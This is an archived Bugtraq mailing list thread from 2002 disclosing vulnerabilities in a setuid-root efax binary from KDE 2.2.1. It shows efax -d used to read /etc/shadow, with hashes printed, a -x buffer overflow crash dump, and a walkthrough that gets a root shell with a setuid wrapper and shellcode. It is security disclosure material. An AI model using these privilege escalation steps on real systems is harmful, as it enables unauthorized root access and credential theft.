Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: efax

From: H D Moore <sflist () digitaloffense net>
Date: Wed, 16 Jan 2002 03:55:27 -0600
Since this is getting cc'd to butraq, here is a little background:

The version of efax I have was part of a kde-2.2.1 source build and install. 
The efax program was shipped as part of the klprfax app in the kdeutils
package. The makefile sets this binary to be setuid root on install:

hdm@sliver:~/kdeutils-2.2.1/klprfax > grep chown . -r
./efax/fax:     case $OWNER in '') ;; *) chown $OWNER /dev/$DEV ;; esac
./efax/Makefile:        @(chown root $(bindir)/efax && chmod 4755 $(bindir)/efax) || echo "Was not able to make efax 
setuid root"
./efax/Makefile.am:     @(chown root $(bindir)/efax && chmod 4755 $(bindir)/efax) || echo "Was not able to make efax 
setuid root"
./efax/Makefile.in:     @(chown root $(bindir)/efax && chmod 4755 $(bindir)/efax) || echo "Was not able to make efax 
setuid root"
./klprfax/klprfax_lpd.in:    chown root $SPOOL/klprfax
./klprfax/klprfax_lpd:    chown root $SPOOL/klprfax
hdm@sliver:~/kdeutils-2.2.1/klprfax >

This has been fixed in KDE 2.2.2 and I have not seen a distro yet that ships 
with efax installed suid root. However, if you installed KDE 2.2.1 from source,
then there is a good chance your efax binary is still setuid.

I posted a message to vuln-dev, stating that I found a setuid copy of efax and
that I was able to read arbitrary files with the -d parameter (/etc/shadow), 
Wodahs responded saying he found an overflow in the -x parameter.

The overflow that he found is easily exploitable:

Running /bin/id:

hdm@sliver> efax -x $EX
efax: Wed Jan 16 03:43:10 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: Wed Jan 16 03:43:10 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: 43:10 compiled Aug 16 2001 10:23:23
efax: 43:10 Error: can't open pre-lock file <nops>ë^)ÀˆF‰F
                     ‰°
                       ‡óS
                            ̀)À@̀èÞÿÿÿ/bin/idAÿ¿/TMP..08795: File name too long
uid=500(hdm) gid=100(users) euid=0(root) groups=100(users)


Getting a root shell:

hdm@sliver > echo 'void main(void){setuid(0);system("/bin/sh");}' > /tmp/ex.c
hdm@sliver > gcc -o /tmp/ex /tmp/ex.c
/tmp/ex.c: In function `main':
/tmp/ex.c:1: warning: return type of `main' is not `int'
hdm@sliver > export EX=`perl genshell.pl 1029 $ADDR`
shell code is: 43 bytes
hdm@sliver > efax -x $EX
efax: Wed Jan 16 03:46:21 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: Wed Jan 16 03:46:21 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: 46:21 compiled Aug 16 2001 10:23:23
efax: 46:21 Error: can't open pre-lock file <nops>ë^)ÀˆF‰F
                     ‰°
                       ‡óS
                            ̀)À@̀èÞÿÿÿ/tmp/exAÿ¿/TMP..08846: File name too long
sh-2.04#

On Wednesday 16 January 2002 03:03 am, Wodahs Latigid wrote:

I found a buffer overflow in efax a while back,
reported it and didn't get a response. Here's
the original email:
-----------------------------------------------
To: edc () cce com
Subject: Efax Buffer Overflow
You may or not be interested (as this has no
major impact on the outside world), but there
is a buffer overflow in the -x function of
efax. Obviously, efax should not be setuid
root, but I can imagine a situation with an
administrator doing so to give "trusted" users
access to the fax facility.
-----------------------------------------------

And here's more detail:

# cat /etc/mandrake-release
Linux Mandrake release 8.0 (Traktopel) for i586

Starting program: /usr/bin/efax -x `perl -e "print 'A' x 1200"`
/usr/bin/efax: Wed Jan 16 09:54:49 2002 efax v 0.9 Copyright 1999 Ed Casas
efax: 54:49 Error: can't open pre-lock file AAAA..[A's
Cut]..AAAATMP..25717: File name too long Program received signal SIGSEGV,
Segmentation fault.
0x41414141 in ?? ()
(gdb) inf reg
.. stuff cut ..
edx            0x65656565       1701143909
ebx            0x41414141       1094795585
esp            0xbffefd58       0xbffefd58
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x41414141       1094795585
eip            0x41414141       0x41414141
.. stuff cut ..

Digital Shadow
http://www.ministryofpeace.co.uk/



-----Original Message-----
From: H D Moore <sflist () digitaloffense net>
Date: Tue, 15 Jan 2002 18:44:57 -0600
To: VULN-DEV () SECURITYFOCUS COM
Subject: efax


Didn't see this mentioned before...

hdm@sliver:~ > which efax
/opt/kde2/bin/efax
hdm@sliver:~ > ls -la /opt/kde2/bin/efax
-rwsr-xr-x    1 root     root        96689 Aug 16 10:23
/opt/kde2/bin/efax hdm@sliver:~ > efax -h
efax: Tue Jan 15 18:43:28 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: Tue Jan 15 18:43:28 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: 43:28 compiled Aug 16 2001 10:23:23
efax: 43:28 Error: no argument for (-h)
Usage:
  efax [ option ]... [ -t num [ file... ] ]
Options:
  -a str  use command ATstr to answer
  -c cap  set modem and receive capabilites to cap
  -d dev  use modem on device dev
  -e cmd  exec "/bin/sh -c cmd" for voice calls
  -f fnt  use (PBM) font file fnt for headers
  -g cmd  exec "/bin/sh -c cmd" for data calls
  -h hdr  use page header hdr (use %d's for current page/total pages)
  -i str  send modem command ATstr at start
  -j str  send modem command ATstr after set fax mode
  -k str  send modem command ATstr when done
  -l id   set local identification to id
  -o opt  use protocol option opt:
      0     use class 2.0 instead of class 2 modem commands
      1     use class 1 modem commands
      2     use class 2 modem commands
      a     if first [data mode] answer attempt fails retry as fax
      e     ignore errors in modem initialization commands
      f     use virtual flow control
      h     use hardware flow control
      l     halve lock file polling interval
      n     ignore page retransmission requests
      r     do not reverse received bit order for Class 2 modems
      x     use XON instead of DC2 to trigger reception
      z     add 100 ms to pause before each modem comand (cumulative)
  -q ne   ask for retransmission if more than ne errors per page
  -r pat  save received pages into files pat.001, pat.002, ...
  -s      share (unlock) modem device while waiting for call
  -v lvl  print messages of type in string lvl (ewinchamr)
  -w      don't answer phone, wait for OK or CONNECT instead
  -x fil  use uucp-style lock file fil
Commands:
  -t      dial num and send fax image files file...
efax: 43:28 done, returning 2 (unrecoverable error)
hdm@sliver:~ > efax -d /etc/shadow
efax: Tue Jan 15 18:43:35 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: Tue Jan 15 18:43:35 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: 43:35 compiled Aug 16 2001 10:23:23
efax: 43:35 opened /etc/shadow
efax: 43:35 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for
device efax: 43:35 Warning: unexpected response
"root:sjSs9mscTsosA:11521:0:10000::::" efax: 43:35 Warning: unexpected
response "bin:*:8902:0:10000::::" efax: 43:35 Warning: unexpected
response "daemon:*:8902:0:10000::::" efax: 43:35 Warning: unexpected
response "lp:*:9473:0:10000::::" efax: 43:35 Warning: unexpected response
"news:*:8902:0:10000::::"; efax: 43:35 Warning: unexpected response
"uucp:*:0:0:10000::::"
efax: 43:35 Warning: unexpected response "games:*:0:0:10000::::"
efax: 43:35 Warning: unexpected response "man:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "at:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "lnx:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "mdom:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "yard:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "wwwrun:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "squid:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "postgres:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "fax:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "gnats:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "empress:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "adabas:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "amanda:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "ixess:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "irc:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "ftp:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "firewall:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "informix:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "named:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "virtuoso:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "fnet:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "gdm:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "postfix:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "cyrus:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "nps:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "skyrix:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "dbmaker:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "fixadm:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "fib:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "fixlohn:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "mysql:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "dpbox:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "ingres:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "codadmin:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "zope:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "vscan:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "wnn:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "pop:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "perforce:*:8902:0:10000::::"
efax: 43:35 Warning: unexpected response "nobody:*:0:0:10000::::"
efax: 43:35 Warning: unexpected response
"hdm:snBsN0stfzsMg:11564:0:99999:7:0::" efax: 43:35 Warning: unexpected
response "oracle:!:11556:0:99999:3:0::" efax: 43:35 Warning: unexpected
response "yaku:!:11636:0:99999:3:0::" efax: 43:35 Error: tcgetattr on
fd=3 failed: Inappropriate ioctl for device efax: 43:35 sync: dropping
DTR
efax: 43:35 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for
device efax: 43:36 Error: tcgetattr on fd=3 failed: Inappropriate ioctl
for device efax: 43:36 Error: tcgetattr on fd=3 failed: Inappropriate
ioctl for device efax: 43:36 sync: sending escapes
efax: 43:36 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for
device efax: 43:36 Error: tcgetattr on fd=3 failed: Inappropriate ioctl
for device efax: 43:37 Error: sync: modem not responding
efax: 43:37 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for
device efax: 43:37 done, returning 2 (unrecoverable error)

--
H D Moore
http://www.digitaldefense.net - work
http://www.digitaloffense.net - play


-- 
H D Moore
http://www.digitaldefense.net - work
http://www.digitaloffense.net - play
Previous By Date Next
Previous By Thread Next

Current thread: